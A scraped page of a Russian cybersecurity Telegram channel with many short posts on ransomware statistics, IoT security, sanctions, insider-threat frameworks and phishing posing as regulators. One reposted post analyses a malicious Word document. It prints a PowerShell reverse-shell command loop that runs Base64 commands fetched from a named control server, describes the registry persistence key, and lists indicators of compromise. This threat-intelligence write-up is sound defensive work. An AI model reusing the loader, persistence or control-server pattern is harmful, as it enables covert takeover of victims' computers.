alukatsky | Технологии

Telegram-канал alukatsky - Пост Лукацкого

26862

Уникальный контент про кибербезопасность от Алексея Лукацкого (@alukatsk) - мысли, полезные ссылки, комментарии к текущим событиям, юмор и мемасики. Канал личный - мой работодатель никак не влияет на то, что здесь публикуется. Рекламу не размещаю!!!

Подписаться на канал

Пост Лукацкого

🛍 Интересные цифры: 74% компаний, подвергшихся атакам шифровальщиков с целью получения выкупа за последние 12 месяцев, были атакованы несколько раз, причем многие - в течение одной недели! 😮

Так что расслабляться после атаки не стоит - она может повториться и второй, и третий раз


78% атакованных организаций заплатили выкуп 🤑, а 72% заплатили его несколько раз. При этом 33% заплатили выкуп четыре и более раз 😲

Это, конечно, не 4 раза по 75 миллионов, но все равно суммы значимые 💰


87% атак привело к сбоям в работе бизнеса, даже у тех, кто заплатил выкуп, - включая потерю данных и необходимость отключения систем. Для 16% компаний атака поставила перед дилеммой "жизнь или смерть".

То есть для каждой 6-й компании атака шифровальщика стала, по сути, недопустимым событием 💥


49% жертв потребовалось от 1 до 7 дней для восстановления бизнес-операций до минимальной функциональности ИТ, а 12% - 7 дней и более

Это если вас, вдруг, спросят, во сколько вам обойдется стоимость атаки, а вы решите посчитать не только затраты на восстановление и выкуп, но и упущенную выгоду и стоимость простоя 📈

Читать полностью…

Пост Лукацкого

Выступил вчера на ИТ-Пикнике с рассказом про безопасность Интернета вещей и устройств, которые нас окружают сейчас и которых будет еще больше в ближайшее время. Шлёпки, велосипеды 🚲, дезодоранты, зубные щетки, вибраторы, вилки, аквариумы 🪸, кардиостимуляторы, пылесосы и многие другие устройства, которые сегодня небезопасны и необдуманно используются людьми, неподозревающими, что они представляют из себя угрозу для них самих, для их близких и окружающих 🔓

Презентацию 📄 прилагаю (когда появится видео, тоже поделюсь). Организаторам респект за все! 🤝

Читать полностью…

Пост Лукацкого

Вы же помните, что 12-го сентября будет не только 29 лет термину "хакатон", но и вступят в силу очередные санкции США, согласно которым будет запрещено ⛔️ оказывать ИТ-услуги всем российским организациям? 🇺🇸 Я когда в июле рефлексировал на последнюю тему, то сделал два предположения:
1️⃣ Возможно расширительное толкование термина enterprise management software.
2️⃣ Возможно будут использовать блокировки по GeoIP 🤬

И вот вам яркий пример реализации обоих предположений. Известный многим сервис Miro, разработанный россиянами, с 12 сентября перестанет оказывать услуги в России, а в качестве определения "русскости" используются IP-адреса, с которых осуществлялся доступ к Miro в последние месяцы 🧑‍💻

Ну а дальше, как говорится в Евангелии от Луки (8:8): "Имеющий уши, да услышит!" С учетом новой информации стоит еще раз пересмотреть список ПО, происходящего из США, которое используется в деятельности служб ИБ. Чтобы 13 сентября (в США еще будет 12-е) у вас не началось со звонков "Мля, у нас ничего не работает" 🤓

Читать полностью…

Пост Лукацкого

Тут МТС в свой сервис "Защитник" добавил новую возможность - контроль утечек информации. Ну я и решил его попробовать. Сразу скажу, что впечатления неоднозначные и вот почему:
1️⃣ При подключении услуги и в течение нескольких дней после этого сервис у меня никаких утечек не обнаруживал. Предположу, что МТС просто обращается к внешнему сервису по API запросу и делает это не в онлайне (на самом деле я даже знаю, куда он обращается). Там бы четче написать, как работает сервис, а то я совершенно случайно зашел в приложение спустя пару недель и нашел там список утечек.
2️⃣ Когда сервис пишет, что произошла утечка из некоего банка, рекомендует сменить карту, но не говорит, что за банк, то это выглядит странновато. Из всех дальнейших утечек именно эта меня очень заинтересовала, но по ней нет вообще никаких деталей, чтобы предпринять какие-то действия. Интересно, что я не слышал про утечки из банков, которыми пользуюсь.
3️⃣ Утечка с портала Госуслуг?.. Все отрицают, что такая утечка имела место быть.
4️⃣ Утечка из ЕСИА? По ней совет, конечно, понятный, но я не знаю никого, кто бы пошел менять паспорт из-за утечки его персональных данных.
5️⃣ Последняя "утечка" интересна. Я никогда не регистрировался в интим-магазине, ни в российском, ни в зарубежных (несмотря про регулярные рассказы о взломах сексуальных игрушек). Кто-то явно хотел подшутить надо мной, указав мои персональные данные; тем более, что номер моего телефона узнать не так-то и сложно.
6️⃣ В списке преимущественно российские утечки, но даже они далеко не все. Я знаю, что по мне есть точно утечка в базе авиаперелетов, но в услуге от МТС ее нет. Из иностранных там затесался clubhouse, но вот куча остальных сервисов, которые показываются другими сервисами, там отсутствует.
7️⃣ Некоторые утечки вообще непонятны, что они из себя представляют. Например, "Пропуска". Что это? Откуда? Какие пропуска? Почему там мои паспортные данные?

В целом, впечатление неоднозначное. Недоработана услуга еще для эффективного использования. Но как еще один сервис в копилку, почему бы и нет. Все равно бесплатно (для МТС Premium). Если сложить выдаваемые им утечки с иностранными, то получится вполне себе набор.

Читать полностью…

Пост Лукацкого

Лукацкий или Агутин? Наверное, каждый, кто пойдет завтра (в субботу) на ИТ-Пикник Т-Банка задается таким вопросом 🤔 Но не надо гадать, идите на мое выступление "От стелек и кардиостимуляторов до умных пылесосов и колонок. Что делать с их небезопасностью?", а уже потом можно пойти послушать "босоногого мальчика" 🎤

Мое выступление будет в 18.00 в лектории "Кибербезопасность" 🛡 Передо мной будут с 13-ти часов выступать Евгений Волошин, Александра Котельникова, Сергей Голованов, Андрей Костин с докладами про OSINT, биометрию, ландшафт угроз, космические системы, а также дискуссия (Дмитрий Гадарь, Алексей Усанов, Александр Каледа, Дмитрий Евдокимов и Александо Ершов) и киберквиз от Кибердома 🤔

ЗЫ. У 🟥 также будет свой стенд, где будем много всяких активностей. Увидимся на ИТ-Пикнике 🤝

Читать полностью…

Пост Лукацкого

А вот тут ребятки из MIT взяли с полсотни существующих таксономий рисков и угроз, связанных с искусственным интеллектом, проанализировали их и разработали базу данных AI Risk Repository, содержащий свыше 700 ИИ-рисков. База данных сделана на базе Google Sheet и может быть переиспользована для своих нужд 🧠

Читать полностью…

Пост Лукацкого

22 августа в 14.00 (мск) открою новый сезон позитивных вебинаров разговором о методах оценки эффективности аналитиков, процессов и инструментов, применяемых в SOC 📈. На трансляции вы узнаете:
1️⃣ Зачем и как измерять эффективность ИБ в целом и SOC в частности?
2️⃣ Какие показатели использовать для мониторинга, реагирования, threat intelligence, threat hunting и других процессов?
3️⃣ Можно ли уйти от измерения числа инцидентов, среднего времени реагирования и заменить их бизнес-ориентированными показателями?
4️⃣ Стоимость учетной записи в даркнет, количество негативных упоминаний в СМИ, предотвращенных недопустимых событий и другие примеры кумулятивных метрик для SOC?
5️⃣ Лайфхаки для оценки эффективности.

Вы получите ключевые метрики для оценки разных аспектов работы SOC, а в качестве бонуса — примеры из практики, которые помогут вам внедрить эти метрики в своей компании. Присоединяйтесь! 🤝

Читать полностью…

Пост Лукацкого

Тут австралийцы задались вопросом кибербезопасности дронов 🛸 и выпустили небольшой отчетик о том, какую роль БПЛА играют в ИБ, какие угрозы ИБ они несут, и как вообще эта тема регулируется в мире. Не то, чтобы открытие и вау, но как первый подход к снаряду вполне себе. Для начала разговора вполне подойдет 🛸

Читать полностью…

Пост Лукацкого

Мда, маркетологам в забугорщине непросто приходится. Что не креатив, то потом извиняйся перед геями, лесбиянками, небинарными личностями, женщинами, афроамериканцами и афроафриканцами, коренными жителями США, католиками и протестантами, иудеями и православными... 🌈

Вот Palo Alto на DEFCON решило сделать живые торшеры, в качестве моделей для которых взяли молодых девушек 👩🏼 Еще 3-4 года назад ни у кого и мысли бы не возникло возмущаться - на выставках с преимущественно мужским контингентом полуголые грации, бодиарт, гимнастки под потолком... были в порядке вещей на всех материках, кроме, пожалуй Антарктиды 🌏 А вот тут случился облом, да такой, что генеральному директору ИБ-вендора пришлось публично извиниться перед всеми, кого обидела эта инсталляция. Или перформанс? Я все время их путаю.

А дальше ведь еще хуже будет. Точнее не креативно и скучно. Все будут бояться сделать что-то не то, что-то, что может обидеть или "тех", или "этих". А значит все будут серые и одинаковые, скучные и безликие... То ли дело у нас 😎 Правда, у нас другие проблемы.

Читать полностью…

Пост Лукацкого

Если вы вдруг вы, случайно, узнали, что к вам идет проверка, задача которой оценить ваш план реагирования на инциденты ✔️ (а у вас он должен быть согласно нормативке), а вы эту свою обязанность мягко говоря просрали, то рекомендую распечатать приведенную картинку и выдать ее за план реагирования! 💡

Во-первых, это действительно план действий, хоть и хреновый ☺️ Во-вторых, распечатка означает, что вы о задаче хотя бы думали и даже предприняли какие-то действия, а это уже лучше, чем "ну не смогла я". В-третьих, это смешно, а проверяющие тоже люди и они тоже могут посмеяться с вами и простить на первый раз! 😇

Но лучше, конечно, о плане позаботиться заранее! 😕

Читать полностью…

Пост Лукацкого

Видел я тут на дороге автомобильный 🚘 номер - А256ЕС. И подумал, что это, пожалуй, единственный, как мне кажется, вариант номера, который соответствует ГОСТу и имеет отношение к ИБ (256 бит ключа у алгоритма шифрования AES). Есть, конечно, варианты О152РУ (вместо 152 можно поставить и 187), но это уже больше притянуто за уши к ИБ. У американцев все-таки классная практика, когда ты за деньги можешь себе собственный автомобильный номер выбрать 🚗 Я бы себе что-нибудь ИБшное обязательно взял.

Читать полностью…

Пост Лукацкого

У MITRE есть проект по матрице внутренних угроз, очень похожий по идеологии на MITRE ATT&CK. Но, как это ни странно, он такой далеко не единственный и нашлись желающие внести свою лепту в создание очередного фреймворка по борьбе с внутренней угрозой. При этом, это не просто "очередная матрица". В новом проекте, Insider Threat Matrix, речь идет не только о методах, используемых инсайдерами, но и о мотивах и используемых ими средствах, а также о мерах обнаружения и защиты такой внутренней активности 👺

Если MITRE ATT&CK делить атаку на 14 тактик, то в Insider Threat Matrix таких фаз всего 5:
1️⃣ Мотив. Приводится 16 различных причин, побуждающих инсайдера совершать свои черные дела (шпионаж, низкая осведомленность, персональная выгода, самосаботаж, человеческая ошибка и т.п.). Можно заметить, что в списке причин не только злонамеренные, но и случайные причины.
2️⃣ Намерение (желание). 19 различных обстоятельств, которые позволяют реализовать нарушение (наличие Bluetooth, установка ПО, печать, снимки экрана, web-доступ и т.п.).
3️⃣ Подготовка. 22 действия, осуществляемые для того, чтобы достигнуть цели по нанесению вреда (обфускация данных, архивация данных, приватный/инкогнито серфинг, чтение реестра Windows, тестирование возможности печати и т.п.).
4️⃣ Нарушение. 18 приносящих вред действия (кража, неавторизованная печать документов, выноси физического носителя, нарушение бизнес-операций, установка неразрешенного ПО и т.п.).
5️⃣ Защита от расследования (антифорензика). 16 действий для заметания следов (очистка артефактов в браузере, удаление учетной записи, удаление файлов, подмена логов, стеганография, удаление ПО и т.п.).

Читать полностью…

Пост Лукацкого

Кстати, о победных коммуникациях 🥳 Был у меня в практике случай, когда меня позвали провести штабные киберучения для топ-менеджеров в одну группу компаний. Я приехал обсуждать сценарии, ограничения, проверяемые болевые точки, список участников и т.п. В конце я спросил, есть ли у заказчика какие-либо вопросы и просьбы. И я их получил 😫

Заказчик в лице CISO попросил, чтобы в рамках штабных киберучений я не проверял ряд сценариев, а по итогам я должен был бы исключить все негативные моменты и показать только то, как компания отлично справляется с инцидентами ИБ На мой логичный вопрос, а в чем тогда смысл, если никто ничего не планирует менять в процессах ИБ, я получил ответ, что в бюджете киберучения заложены 🤑 и в планах на год CISO эту тему заявлял, но его руководство не любит негативных новостей ☹️ и поэтому надо построить всего лишь потемкинские деревни, а за красивой картинкой останется разруха. От таких киберучений я отказался, но сама по себе ситуация не уникальна.

Очень важно, перед началом штабных киберучений, да и любых других ИБ-проектов, задаваться двумя вопросами - "Зачем это надо делать?" и "Какого результата мы хотим/нам надо достичь?". И уже по результатам ответов принимать решение, ввязываться в эту историю или нет.

Читать полностью…

Пост Лукацкого

Во время штабных киберучений, которые я провожу достаточно часто, один из сценариев, которые я проверяю с участниками, - "Вам прилетело письмо от регулятора. Как вы убедитесь, что это письмо от него, а не фейк?" И надо сказать, что этот сценарий все проходят по-разному - кто-то успешно справляется с ответом и предлагает варианты взаимной аутентификации, а кто-то с удивлением задается вопросом: "А что, надо проверять письма от регулятора?".

И вот яркий пример из жизни, что да, надо проверять. Хакеры из группировки UAC-0198 от имени Службы безопасности Украины отправляли фишинговые сообщения различным государственным организациям страны, с помощью которых было заражено более 100 компьютеров вредоносом AnonVNC. О последствиях не сообщается.

Такие кейсы не новость - известны случаи фишинговых сообщения от Службы нацбезопасности Армении, от ФСТЭК, новозеландского CERT, ФинЦЕРТа и т.п. Так что если у вас еще нет соответствующего плейбука, самое время задуматься и уточнить:
У почтовых доменов ваших регуляторов, включая региональные управления, включены DMARC, SPF, DKIM?
У вас есть контакты сотрудников регуляторов, у которых вы можете проверить факт отправки вам сообщений или сделанных звонков?
Вы знаете, как выглядят настоящие сообщения от регуляторов?
Вы читали мою предыдущую заметку про плейбук для сообщений регуляторов?

Читать полностью…

Пост Лукацкого

Если вдруг вы ищете презентации с BlackHat и DEFCON 2024, то их есть у меня:
👨‍💻 BlackHat
👨‍💻 DEFCON

ЗЫ. Там уже бОльшая часть, но, возможно, будут еще что-то докладывать!

ЗЗЫ. Презентации и видео с PHD2 тоже недурны ☺️

Читать полностью…

Пост Лукацкого

🎙 Подкасты на тему информационной безопасности.

• ИБ-подкасты помогут Вам прокачать профессиональные навыки, узнать последние новости, сориентироваться в индустрии и получить много новых знаний в данной сфере.

Hack me, если сможешь — подкаст о современных киберугрозах и защите от них, созданный при поддержке Positive Hack Days — одноименного ИБ-форума.

Смени пароль! — разговорное шоу от экспертов «Лаборатории Касперского» о расследовании киберпреступлений и актуальных угрозах кибербезопасности.

Security Stream Podcast — новости и тенденции кибербезопасности, интервью с известными ИБ-экспертами, обсуждение взломов и методов защиты бизнеса.

Security Vision — подкаст компании «Интеллектуальная безопасность». Обзоры различных средств информационной безопасности и публикаций MITRE.

Информационная безопасность — проект одноименного журнала и сайта ITSec.ru. Представляет собой аудиоверсии избранных статей, зачитанные роботом.

OSINT mindset — свежий подкаст о разведке на основе открытых источников данных, ориентированный на обсуждение методов, инструментов и философии этой дисциплины.

Кверти — шоу студии Red Barn, в котором обсуждают ИБ и в доступной форме объясняют, как противостоять интернет-мошенникам.

Схема — подкаст Т-Ж в котором разоблачитель мошенников с 15-летним стажем погружается в реальные истории обманутых героев и препарирует схемы аферистов.

F.A.C.C.T. — волнующие расследования, захватывающие истории о хакерах и практические советы экспертов по цифровой гигиене.

#Подкаст #ИБ

Читать полностью…

Пост Лукацкого

Почему авторы новых шифровальщиков 🤒 все чаще самостоятельно пишут криптографическую подсистему и особенно подчеркивают это при рекламе своих изделий? И почему они, если верить, что многие из России 🇷🇺, не используют отечественные криптографические алгоритмы? Почему такой непатриотизм?

Я тут услышал версию, что это однозначно выдает в авторах шифровальщиков сотрудников ФСБ 🇷🇺, которые законопослушны и не могут применять отечественный ГОСТ, не сертифицировав конечное изделие в 8-м Центре. А я возразил, что если бы это были сотрудники ФСБ, то они бы точно не стали использовать американский стандарт шифрования 🔐, да еще и вывозить готовое СКЗИ из страны, не получив на это экспортную лицензию. Да и вообще, по мнению ФСБ все, что не использует отечественные криптографические алгоритмы, не считается у нас СКЗИ и вообще спецслужбе не интересно 🤷‍♀️

ЗЫ. Все написанное выше - шутка 😂 Кроме реальных скриншотов рекламы шифровальщиков!

Читать полностью…

Пост Лукацкого

В 18.00 доклад 18+ в лектории «Кибербезопасность» в 18х18 м от стенда Позитива в направлении зюйд-зюйд-вест!

Читать полностью…

Пост Лукацкого

Я тут вчитался в текст закона про блогеров-десятитысячников (303-ФЗ) и понял, что тупость пишущих законы прогрессирует, а мем про Интернет на дискетке скоро станет реальностью 🤦‍♂️ Ведь что пишут депутаты, если перевести это на нормальный русский язык, - вы не можете репостить ничего от блогеров-десятитысячников, что не внесено в реестр Роскомпозора. То есть проблема закона не в том, что невнесенные в реестр не могут размещать рекламу и получать донаты, а в том, что круг тех, кого можно репостить и на кого ссылаться, ограничен очень небольшим числом тех, кто попал в реестр 🆒

Вот захочу я, например, репостнуть про окончание 18-го августа приема заявок на стажировки в Positive Technologies и смогу это сделать только если корпоративный канал 🟥 будет внесен в реестр РКН. А вот мемасики от POSIdev могу репостить без ограничений. А все потому, что в одном канале больше 10 тысяч пользователей, а в другом - меньше 🤓

Как репостить из зарубежных соцсетей, включая и Telegram? А вот это самое интересное. По мнению одного из авторов закона, депутата Хинштейна, который никак с женой не разберется, которая в запрещенный в России Instagram до сих пор постит, совершенно неважно, кем и где написан текст. Важно, что он доступен из России, а значит на него распространяется новый закон. А значит репостить материалы ЛЮБОЙ зарубежной соцсети будет нельзя 🤠 Кто не зарегается в РКН, того страницу заблокируют. Если соцсеть откажется блокировать страницу и ее автора, ее заблокируют саму 👮

российские законы
не трудись понять
дважды два четыре
но немножко пять

ЗЫ. Может канал начать дробить, как г-жа Блиновская свои доходы? Завести каналы по 9999 пользователей и ограничить верхнюю планку подписчиков? 🤬 Но репостить все равно будет нельзя.

Читать полностью…

Пост Лукацкого

Пару-тройку лет назад около 20% иностранных сайтов блокировали доступ с российских IP-адресов 🤬 (думаю, что сейчас число таких ресурсов еще больше), что требовало поиска методов решения этой задачи. И не так чтобы их было много. Прокси, VPN, режим инкогнито (с оговорками).

Я эту проблему для себя решил, но гарантий, что мой вариант продержится еще долго, нет. Поэтому я держу руку на пульсе и слежу за новыми VPN, которые появляются в Интернете. И вот мне попался свежий сервис сравнения нескольких десятков VPN по 40 различным критериям. Так что если вам нужен доступ к обучающим и новостным ресурсам по ИБ, то есть из чего выбрать. Правда, не со всеми проставленными оценками я согласен. Например, когда написано, что логи не ведутся 😂

Но в остальном, вполне себе. И пусть никакая иностранная зараза не заблокирует нам доступ к своим ресурсам 💪

‼️ Применять данные средства для обхода российских блокировок ни в коем случае нельзя ‼️

Читать полностью…

Пост Лукацкого

Число враждебных ИИ/LLM растет с каждым днем 🤖 - какие-то из них узкофункциональные, какие-то широкого применения, какие-то фейковые (и выманивают деньги у других киберпреступников), какие-то вполне рабочие 🤖 Вот тут очень неплохое исследование различных враждебных ИИ-моделей 🧠

Читать полностью…

Пост Лукацкого

Надеюсь, никого не оскорбляет? И пропагандой не является? И демонстрацией способов обхода?

Читать полностью…

Пост Лукацкого

Совет по международным отношениям опубликовал статью, в которой обсуждается усиливающаяся цифровая изоляция России 🇷🇺 и ее растущую зависимость от Китая 🇨🇳 Автор пишет, что после вторжения в Украину в 2022 году Россия все больше отрезана от западных технологий и компаний, что привело к активизации сотрудничества с Китаем в сфере технологий. Это создает новые уязвимости для России, особенно в области кибербезопасности и шпионажа против нее 👲

Также автор призывает США 🇺🇸 и их партнеров использовать разведданные из открытых источников, чтобы выявлять спрос России на китайские технологии. Эти данные можно получать из различных источников, включая российские конференции по кибербезопасности (где автор слышала, чтобы у нас про китайцев на ИБ-тусовках говорили?) и публичные контракты. Это поможет обнаружить уязвимые места, такие как зависимость от китайских полупроводников и смартфонов 🧑‍💻

Кроме того, предлагается американской разведке 🇺🇸 провести анализ технологий, таких как Astra Linux, используемых в российских военных системах, что может выявить потенциальные слабые места, которые США и их союзники могут использовать для получения преимуществ в киберпространстве.

Читать полностью…

Пост Лукацкого

!!р^д**н**c 🤔

Характерным примером того, как злоумышленники используют актуальные события для распространения вредоносных программ, может послужить обнаруженный нами вредоносный документ.

Он содержит текст муниципального правового акта, который не отображается корректно, в связи с чем пользователя побуждают «Включить содержимое» и разрешить таким образом выполнение встроенного в документ макроса.

Встроенный макрос приводит документ к читаемому виду путем простой замены комбинаций символов на буквы (;; → у ; ** → o ; ?? → a и т. д.), а также извлекает и закрепляет в автозагрузке полезную нагрузку — достаточно простой реверс-шелл — в виде PowerShell-скрипта.

Полезная нагрузка находится в содержимом документа после строки DigitalRSASignature и состоит из двух частей, закодированных в Base64 и разделенных строкой CHECKSUM<part1>CHECKSUM<part2>, которые декодируются и записываются в файлы:

<part1> -> %USERPROFILE%\\UserCache.ini.hta
<part2> -> %USERPROFILE%\\UserCache.ini

UserCache.ini.hta прописывается макросом в автозапуск Windows Explorer через ключ реестра HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\LOAD. Назначение данного файла — запустить исполнение файла UserCache.ini.

UserCache.ini представляет собой легковесный реверс-шелл, который использует узел 94.103.85.47 (Vdsina, Moscow) как управляющий сервер. Данный инструмент получает и выполняет набор команд с http://94.103.85.47:80/api/texts/<client_id>, где <client_id> = <имя компьютера>_<имя пользователя>_<серийник тома жесткого диска>.

Команды передаются в формате XML и содержат несколько атрибутов:

CountRuns — сколько раз нужно выполнить команду;
Interval — интервал ожидания в минутах между последовательными выполнениями одной команды;
Module — закодированная в Base64 команда.


...
try {
$Commands = [xml]$Configs;
$cycle_num = 0;

while($true){
$num_commands_completely_executed = 0;
$num_commands_executed = 0;
foreach ($CommandConfig in $Commands.Configs.Config)
{
$num_commands_executed += 1;
$quot = [int][Math]::Floor( $cycle_num / [int]$CommandConfig.Interval);
$rem = [int][Math]::Floor( $cycle_num % [int]$CommandConfig.Interval);

if($quot -lt [int]$Command.CountRuns -and $rem -eq 0){
$command_expr = FromBase64 $CommandConfig.Module;
try{
Invoke-Expression($command_expr);
}
catch {}
}

if(([int]$CommandConfig.Interval * [int]$CommandConfig.CountRuns) -lt [int]$cycle_num){
$num_commands_completely_executed += 1;
}
}

Start-Sleep 60;
if([int]$num_commands_completely_executed -eq [int]$num_commands_executed){
break;
}
$cycle_num += 1;
}
}
catch {}
...


Для блокировки автоматического выполнения макросов можно воспользоваться руководством от Microsoft.

IoCs:


Постановление_по_ГО_updated.doc
13252199b18d5257a60f57de95d8c6be7d7973df7f957bca8c2f31e15fcc947b



UserCache.ini.hta
e80e0b57cf3f304cb7d6dba4b0bb65da18f4d32770a3d6f3780fdab12d2617c9



UserCache.ini
ccff23a8f7c510b49264cdacf9ab6b43e9be0671670ce2eec75851920e6378b7



94.103.85.47


#malware #news #detect #ti
@ptescalator

Читать полностью…

Пост Лукацкого

Проблема: сотрудники записывают свои пароли на стикеры и приклеивают их к мониторам 🖥

Способы решения:
Compliance: Остановите это немедленно!
Инженер ИБ: Давайте внедрим OTP!
Риск-аналитик: Спрячьте стикер в ваш кошелек 👛
Бизнес: Если это не приводит к катастрофическим последствиям, забейте 🤘

А вы какой вариант выберете?

Читать полностью…

Пост Лукацкого

Подсобрал некоторые из существующих фреймворков по угрозе от инсайдеров, индикаторам и техникам, методам обнаружения и защиты:
🔤 Insider Threat TTP Knowledge Base v2.0.0 (писал про него)
🔤 Insider Threat Matrix (малость подзаброшен)
🔤 Insider Threat Matrix (описан выше)
🔤 Common Sense Guide to Mitigating Insider Threats, Seventh Edition
🔤 FBI: The Insider Threat: An introduction to detecting and deterring an insider spy (больше фокусируется на различных индикаторах)
🔤 National Insider Threat Task Force (NITTF) от Национальной разведки США
🔤 Insider Attack Matrix
🔤 Insider Risk Management Program Evaluation (переложение NIST CSF на борьбу с инсайдерами от CISA)

Читать полностью…

Пост Лукацкого

Риэлторы-мошенники "развели" Ларису Долину на 130 миллионов рублей!.. 🤑 Да, это реальность! 40 миллионов, 130 миллионов, 27 миллионов, 60 миллионов, 43 миллиона... Суммы, которые получают мошенники 💻 измеряются уже десятками миллионов, что даже по международным меркам в топе. В США кибермошенничество с недвижимостью тоже на первом месте по объему хищений, но там суммы все-таки поменьше, обычно несколько сотен тысяч долларов, до полумиллиона 💸

Читать полностью…

Пост Лукацкого

Знаете, в Cisco была такая практика, когда раз в квартал, какой-нибудь босс писал на всю компанию письмо ✍️ про то, какие мы все молодцы (даже если нет) и как у нас все хорошо (даже если нет) и мы скоро всех порвем (даже если нет). Во время COVID-19 такие письма сменили тональность и топ-менеджеры разного уровня стали в них писать о чем-то простом и понятном, рефлексируя 😭 публично и показывая всем, кто находится в непростой ситуации, что все в одной лодке. Схожая история была, когда в мире происходила какая-нибудь катастрофа или авария. Уже не знаю, были ли такие письма от души или по разнарядке, но создавалось впечатление, что руководство всегда на связи и всегда в курсе всего происходящего. А самое главное, что оно не бросает вас на произвол судьбы 🆘

И вот смотрю я на коммуникации в Курской области своим непрофессиональным взглядом, оцениваю то, что пишут официальные каналы руководителей разных населенных пунктов и субъектов, что пишут СМИ, что пишут в народных каналах... И понимаю, что чиновники не умеют в кризисные коммуникации от слова совсем ☹️ И PR-службы у них отвыкли от правильных коммуникаций, привыкнув только к победным реляциям 🥇 А жители не знают, куда бежать и кого слушать. Утром - "эвакуируйся", днем "все нормально", вечером "немедленно у*бывайте", а ночью "прежнее сообщение считать недействительным". Отсюда паника и очередные потоки брани в адрес руководства... 😫

К чему это я? Да к тому, что в управлении инцидентами, часть связанная с коммуникациями очень важна. Иногда даже важнее всего остального. А иначе люди будут попадаться на "фейковых боссов", "вам звонит мэр", "вам единовременная выплата от президента", "спасите свои средства, переведя их на резервный счет", "установите ПО для удаленной техподдержки"... В условиях выстроенных коммуникаций, мы начинаем додумывать и... совершать ошибки, чем и пользуются плохие парни в мире физическом и виртуальном.

Читать полностью…

Пост Лукацкого

Представьте, что вам предлагают через год возглавить ИБ-службу компании вашей мечты с подчинением генеральному директору 🧐 Рост зарплаты 10х, персональный помощник, большой кабинет с диванчиком с видом на парк, любые ИБ-«игрушки»… 🤑 Но при этом вы должны будете упахаться в течение года, чтобы получить знания и навыки, нужные для работы. Вы не сможете в течение года ездить в отпуск, встречаться с друзьями, ходить на выставки, в кино и рестораны. У вас даже не будет нормальных выходных. Все ваше время будет уходить на учебу 😫

Читать полностью…

Пост Лукацкого

Когда участники "хакерских" конференций жалуются, что персонал отелей их гнобит, не любит, шмонает и т.п., они должны понимать, что они [участники] для персонала и есть угроза 👮 Такая же, как вредоносы, DDoS, RCE и т.п. - угрозы для ИБшников. И десятких фейковых точек доступа в отеле, неработающие банкоматы, взломанные системы цифрового контента, включающаяся ночью сигнализация - это проблема для других проживающих, коим не повезло снять номер в те же даты, что и BlackHat/DEFCON, а также и для самих отелей. У всех своя модель угроз 🤔

Читать полностью…
Подписаться на канал